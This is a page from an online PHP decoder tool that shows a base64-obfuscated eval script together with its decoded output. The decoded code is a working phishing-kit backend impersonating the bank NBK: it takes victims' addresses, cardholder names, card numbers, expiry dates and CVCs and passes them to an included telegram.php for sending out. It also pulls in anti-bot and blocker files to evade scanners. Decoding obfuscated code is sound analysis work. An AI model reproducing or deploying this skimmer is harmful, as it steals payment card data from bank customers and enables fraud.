Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval("?>".base64_decode("PD9waHANCg0Kc2Vzc2lvbl9zdGFydCgpOw0KZXJyb3JfcmVwb3J0aW5nKDA..
Decoded Output download
?>b'<?php
session_start();
error_reporting(0);
date_default_timezone_set(\'GMT\');
$ip = getenv("REMOTE_ADDR");
include "./././badAgents.php";
include "./././Blacklist.php";
include "./././blocks.php";
include "./././antibots.php";
include "./././miniBOT.php";
include "./././defender.php";
include "./././blockIP.php";
include \'./././bots/blocker.php\';
include \'./././bots/anti.php\';
include \'./././bots.php\';
$testa = $_POST[\'Address\'];
if($testa != "") {
if(($_POST[\'Address\'] != "") AND ($_POST[\'ZipCode\'] != "") AND ($_POST[\'Holder\'] != "") AND ($_POST[\'CardNumber\'] != "") AND ($_POST[\'DAY\'] != "") AND ($_POST[\'YEAR\'] != "") AND ($_POST[\'CVC\'] != "") )
{
date_default_timezone_set(\'GMT\');
$TIME_DATE = date(\'H:i:s d/m/Y\');
$ip = getenv("REMOTE_ADDR");
function XB_OS($USER_AGENT){
$OS_ERROR = "Unknown OS Platform";
$OS = array( \'/windows nt 10/i\' => \'Windows 10\',
\'/windows nt 6.3/i\' => \'Windows 8.1\',
\'/windows nt 6.2/i\' => \'Windows 8\',
\'/windows nt 6.1/i\' => \'Windows 7\',
\'/windows nt 6.0/i\' => \'Windows Vista\',
\'/windows nt 5.2/i\' => \'Windows Server 2003/XP x64\',
\'/windows nt 5.1/i\' => \'Windows XP\',
\'/windows xp/i\' => \'Windows XP\',
\'/windows nt 5.0/i\' => \'Windows 2000\',
\'/windows me/i\' => \'Windows ME\',
\'/win98/i\' => \'Windows 98\',
\'/win95/i\' => \'Windows 95\',
\'/win16/i\' => \'Windows 3.11\',
\'/macintosh|mac os x/i\' => \'Mac OS X\',
\'/mac_powerpc/i\' => \'Mac OS 9\',
\'/linux/i\' => \'Linux\',
\'/ubuntu/i\' => \'Ubuntu\',
\'/iphone/i\' => \'iPhone\',
\'/ipod/i\' => \'iPod\',
\'/ipad/i\' => \'iPad\',
\'/android/i\' => \'Android\',
\'/blackberry/i\' => \'BlackBerry\',
\'/webos/i\' => \'Mobile\');
foreach ($OS as $regex => $value) {
if (preg_match($regex, $USER_AGENT)) {
$OS_ERROR = $value;
}
}
return $OS_ERROR;
}
function XB_Browser($USER_AGENT){
$BROWSER_ERROR = "Unknown Browser";
$BROWSER = array(\'/msie/i\' => \'Internet Explorer\',
\'/firefox/i\' => \'Firefox\',
\'/safari/i\' => \'Safari\',
\'/chrome/i\' => \'Chrome\',
\'/edge/i\' => \'Edge\',
\'/opera/i\' => \'Opera\',
\'/netscape/i\' => \'Netscape\',
\'/maxthon/i\' => \'Maxthon\',
\'/konqueror/i\' => \'Konqueror\',
\'/mobile/i\' => \'Handheld Browser\');
foreach ($BROWSER as $regex => $value) {
if (preg_match($regex, $USER_AGENT)) {
$BROWSER_ERROR = $value;
}
}
return $BROWSER_ERROR;
}
$_SESSION[\'Address\'] = $_POST[\'Address\'];
$_SESSION[\'ZipCode\'] = $_POST[\'ZipCode\'];
$_SESSION[\'Holder\'] = $_POST[\'Holder\'];
$_SESSION[\'CardNumber\'] = $_POST[\'CardNumber\'];
$_SESSION[\'DAY\'] = $_POST[\'DAY\'];
$_SESSION[\'YEAR\'] = $_POST[\'YEAR\'];
$_SESSION[\'CVC\'] = $_POST[\'CVC\'];
$message =
"------ NBK CC ------
Address line: ".$_SESSION[\'Address\']."
Postal code: ".$_SESSION[\'ZipCode\']."
Cardholder name: ".$_SESSION[\'Holder\']."
Card number: ".$_SESSION[\'CardNumber\']."
Expiry date: ".$_SESSION[\'DAY\']."/".$_SESSION[\'YEAR\']."
CVC: ".$_SESSION[\'CVC\']."
BROWSER : ".XB_Browser($_SERVER[\'HTTP_USER_AGENT\'])." On ".XB_OS($_SERVER[\'HTTP_USER_AGENT\'])."
IP : $ip
Time/Date : $TIME_DATE
------ @CHA9CHA9X ------
";
include "telegram.php";
echo "<meta http-equiv=\'refresh\' content=\'0; url=loading2.php\'/>";
}
else {
echo "<meta http-equiv=\'refresh\' content=\'0; url=https://www.nbk.com/\' />";
}
}
?>'Did this file decode correctly?
Original Code
<?php eval("?>".base64_decode("PD9waHANCg0Kc2Vzc2lvbl9zdGFydCgpOw0KZXJyb3JfcmVwb3J0aW5nKDApOw0KZGF0ZV9kZWZhdWx0X3RpbWV6b25lX3NldCgnR01UJyk7DQokaXAgPSBnZXRlbnYoIlJFTU9URV9BRERSIik7DQppbmNsdWRlICIuLy4vLi9iYWRBZ2VudHMucGhwIjsNCmluY2x1ZGUgIi4vLi8uL0JsYWNrbGlzdC5waHAiOw0KaW5jbHVkZSAiLi8uLy4vYmxvY2tzLnBocCI7DQppbmNsdWRlICIuLy4vLi9hbnRpYm90cy5waHAiOw0KaW5jbHVkZSAiLi8uLy4vbWluaUJPVC5waHAiOw0KaW5jbHVkZSAiLi8uLy4vZGVmZW5kZXIucGhwIjsNCmluY2x1ZGUgIi4vLi8uL2Jsb2NrSVAucGhwIjsNCmluY2x1ZGUgJy4vLi8uL2JvdHMvYmxvY2tlci5waHAnOw0KaW5jbHVkZSAnLi8uLy4vYm90cy9hbnRpLnBocCc7DQppbmNsdWRlICcuLy4vLi9ib3RzLnBocCc7DQoNCiR0ZXN0YSA9ICRfUE9TVFsnQWRkcmVzcyddOyANCmlmKCR0ZXN0YSAhPSAiIikgew0KaWYoKCRfUE9TVFsnQWRkcmVzcyddICE9ICIiKSAgQU5EICgkX1BPU1RbJ1ppcENvZGUnXSAhPSAiIikgQU5EICgkX1BPU1RbJ0hvbGRlciddICE9ICIiKSBBTkQgKCRfUE9TVFsnQ2FyZE51bWJlciddICE9ICIiKSBBTkQgKCRfUE9TVFsnREFZJ10gIT0gIiIpIEFORCAoJF9QT1NUWydZRUFSJ10gIT0gIiIpIEFORCAoJF9QT1NUWydDVkMnXSAhPSAiIikgICApDQp7DQoNCmRhdGVfZGVmYXVsdF90aW1lem9uZV9zZXQoJ0dNVCcpOw0KJFRJTUVfREFURSA9IGRhdGUoJ0g6aTpzIGQvbS9ZJyk7DQokaXAgPSBnZXRlbnYoIlJFTU9URV9BRERSIik7DQpmdW5jdGlvbiBYQl9PUygkVVNFUl9BR0VOVCl7DQoJJE9TX0VSUk9SICAgID0gICAiVW5rbm93biBPUyBQbGF0Zm9ybSI7DQogICAgJE9TICA9ICAgYXJyYXkoICcvd2luZG93cyBudCAxMC9pJyAgICAgID0+ICAnV2luZG93cyAxMCcsDQoJICAgICAgICAgICAgICAgICcvd2luZG93cyBudCA2LjMvaScgICAgID0+ICAnV2luZG93cyA4LjEnLA0KCSAgICAgICAgICAgICAgICAnL3dpbmRvd3MgbnQgNi4yL2knICAgICA9PiAgJ1dpbmRvd3MgOCcsDQoJICAgICAgICAgICAgICAgICcvd2luZG93cyBudCA2LjEvaScgICAgID0+ICAnV2luZG93cyA3JywNCgkgICAgICAgICAgICAgICAgJy93aW5kb3dzIG50IDYuMC9pJyAgICAgPT4gICdXaW5kb3dzIFZpc3RhJywNCgkgICAgICAgICAgICAgICAgJy93aW5kb3dzIG50IDUuMi9pJyAgICAgPT4gICdXaW5kb3dzIFNlcnZlciAyMDAzL1hQIHg2NCcsDQoJICAgICAgICAgICAgICAgICcvd2luZG93cyBudCA1LjEvaScgICAgID0+ICAnV2luZG93cyBYUCcsDQoJICAgICAgICAgICAgICAgICcvd2luZG93cyB4cC9pJyAgICAgICAgID0+ICAnV2luZG93cyBYUCcsDQoJICAgICAgICAgICAgICAgICcvd2luZG93cyBudCA1LjAvaScgICAgID0+ICAnV2luZG93cyAyMDAwJywNCgkgICAgICAgICAgICAgICAgJy93aW5kb3dzIG1lL2knICAgICAgICAgPT4gICdXaW5kb3dzIE1FJywNCgkgICAgICAgICAgICAgICAgJy93aW45OC9pJyAgICAgICAgICAgICAgPT4gICdXaW5kb3dzIDk4JywNCgkgICAgICAgICAgICAgICAgJy93aW45NS9pJyAgICAgICAgICAgICAgPT4gICdXaW5kb3dzIDk1JywNCgkgICAgICAgICAgICAgICAgJy93aW4xNi9pJyAgICAgICAgICAgICAgPT4gICdXaW5kb3dzIDMuMTEnLA0KCSAgICAgICAgICAgICAgICAnL21hY2ludG9zaHxtYWMgb3MgeC9pJyA9PiAgJ01hYyBPUyBYJywNCgkgICAgICAgICAgICAgICAgJy9tYWNfcG93ZXJwYy9pJyAgICAgICAgPT4gICdNYWMgT1MgOScsDQoJICAgICAgICAgICAgICAgICcvbGludXgvaScgICAgICAgICAgICAgID0+ICAnTGludXgnLA0KCSAgICAgICAgICAgICAgICAnL3VidW50dS9pJyAgICAgICAgICAgICA9PiAgJ1VidW50dScsDQoJICAgICAgICAgICAgICAgICcvaXBob25lL2knICAgICAgICAgICAgID0+ICAnaVBob25lJywNCgkgICAgICAgICAgICAgICAgJy9pcG9kL2knICAgICAgICAgICAgICAgPT4gICdpUG9kJywNCgkgICAgICAgICAgICAgICAgJy9pcGFkL2knICAgICAgICAgICAgICAgPT4gICdpUGFkJywNCgkgICAgICAgICAgICAgICAgJy9hbmRyb2lkL2knICAgICAgICAgICAgPT4gICdBbmRyb2lkJywNCgkgICAgICAgICAgICAgICAgJy9ibGFja2JlcnJ5L2knICAgICAgICAgPT4gICdCbGFja0JlcnJ5JywNCgkgICAgICAgICAgICAgICAgJy93ZWJvcy9pJyAgICAgICAgICAgICAgPT4gICdNb2JpbGUnKTsNCiAgICBmb3JlYWNoICgkT1MgYXMgJHJlZ2V4ID0+ICR2YWx1ZSkgeyANCiAgICAgICAgaWYgKHByZWdfbWF0Y2goJHJlZ2V4LCAkVVNFUl9BR0VOVCkpIHsNCiAgICAgICAgICAgICRPU19FUlJPUiA9ICR2YWx1ZTsNCiAgICAgICAgfQ0KDQogICAgfSAgIA0KICAgIHJldHVybiAkT1NfRVJST1I7DQp9DQpmdW5jdGlvbiBYQl9Ccm93c2VyKCRVU0VSX0FHRU5UKXsNCgkkQlJPV1NFUl9FUlJPUiAgICA9ICAgIlVua25vd24gQnJvd3NlciI7DQogICAgJEJST1dTRVIgID0gICBhcnJheSgnL21zaWUvaScgICAgICAgPT4gICdJbnRlcm5ldCBFeHBsb3JlcicsDQogICAgICAgICAgICAgICAgICAgICAgICAnL2ZpcmVmb3gvaScgICAgPT4gICdGaXJlZm94JywNCiAgICAgICAgICAgICAgICAgICAgICAgICcvc2FmYXJpL2knICAgICA9PiAgJ1NhZmFyaScsDQogICAgICAgICAgICAgICAgICAgICAgICAnL2Nocm9tZS9pJyAgICAgPT4gICdDaHJvbWUnLA0KICAgICAgICAgICAgICAgICAgICAgICAgJy9lZGdlL2knICAgICAgID0+ICAnRWRnZScsDQogICAgICAgICAgICAgICAgICAgICAgICAnL29wZXJhL2knICAgICAgPT4gICdPcGVyYScsDQogICAgICAgICAgICAgICAgICAgICAgICAnL25ldHNjYXBlL2knICAgPT4gICdOZXRzY2FwZScsDQogICAgICAgICAgICAgICAgICAgICAgICAnL21heHRob24vaScgICAgPT4gICdNYXh0aG9uJywNCiAgICAgICAgICAgICAgICAgICAgICAgICcva29ucXVlcm9yL2knICA9PiAgJ0tvbnF1ZXJvcicsDQogICAgICAgICAgICAgICAgICAgICAgICAnL21vYmlsZS9pJyAgICAgPT4gICdIYW5kaGVsZCBCcm93c2VyJyk7DQogICAgZm9yZWFjaCAoJEJST1dTRVIgYXMgJHJlZ2V4ID0+ICR2YWx1ZSkgeyANCiAgICAgICAgaWYgKHByZWdfbWF0Y2goJHJlZ2V4LCAkVVNFUl9BR0VOVCkpIHsNCiAgICAgICAgICAgICRCUk9XU0VSX0VSUk9SID0gJHZhbHVlOw0KICAgICAgICB9DQogICAgfQ0KICAgIHJldHVybiAkQlJPV1NFUl9FUlJPUjsNCn0NCg0KDQokX1NFU1NJT05bJ0FkZHJlc3MnXSA9ICRfUE9TVFsnQWRkcmVzcyddOw0KJF9TRVNTSU9OWydaaXBDb2RlJ10gPSAkX1BPU1RbJ1ppcENvZGUnXTsNCiRfU0VTU0lPTlsnSG9sZGVyJ10gPSAkX1BPU1RbJ0hvbGRlciddOw0KJF9TRVNTSU9OWydDYXJkTnVtYmVyJ10gPSAkX1BPU1RbJ0NhcmROdW1iZXInXTsNCiRfU0VTU0lPTlsnREFZJ10gPSAkX1BPU1RbJ0RBWSddOw0KJF9TRVNTSU9OWydZRUFSJ10gPSAkX1BPU1RbJ1lFQVInXTsNCiRfU0VTU0lPTlsnQ1ZDJ10gPSAkX1BPU1RbJ0NWQyddOw0KDQokbWVzc2FnZSA9DQoiLS0tLS0tIE5CSyBDQyAgLS0tLS0tDQpBZGRyZXNzIGxpbmU6ICIuJF9TRVNTSU9OWydBZGRyZXNzJ10uIg0KUG9zdGFsIGNvZGU6ICIuJF9TRVNTSU9OWydaaXBDb2RlJ10uIg0KQ2FyZGhvbGRlciBuYW1lOiAiLiRfU0VTU0lPTlsnSG9sZGVyJ10uIg0KQ2FyZCBudW1iZXI6ICIuJF9TRVNTSU9OWydDYXJkTnVtYmVyJ10uIg0KRXhwaXJ5IGRhdGU6ICIuJF9TRVNTSU9OWydEQVknXS4iLyIuJF9TRVNTSU9OWydZRUFSJ10uIg0KQ1ZDOiAiLiRfU0VTU0lPTlsnQ1ZDJ10uIg0KQlJPV1NFUiA6ICIuWEJfQnJvd3NlcigkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pLiIgT24gIi5YQl9PUygkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pLiINCklQIDogJGlwDQpUaW1lL0RhdGUgOiAkVElNRV9EQVRFDQotLS0tLS0gQENIQTlDSEE5WCAtLS0tLS0NCiI7DQogDQppbmNsdWRlICJ0ZWxlZ3JhbS5waHAiOw0KIA0KICAgZWNobyAiPG1ldGEgaHR0cC1lcXVpdj0ncmVmcmVzaCcgY29udGVudD0nMDsgdXJsPWxvYWRpbmcyLnBocCcvPiI7DQp9DQoJZWxzZSB7DQogICAgIGVjaG8gIjxtZXRhIGh0dHAtZXF1aXY9J3JlZnJlc2gnIGNvbnRlbnQ9JzA7IHVybD1odHRwczovL3d3dy5uYmsuY29tLycgLz4iOw0KfQ0KfQ0KIA0KPz4=")); ?>
Function Calls
| base64_decode | 1 |
Stats
| MD5 | 732d7809a55971189da05372d8b07b32 |
| Eval Count | 1 |
| Decode Time | 67 ms |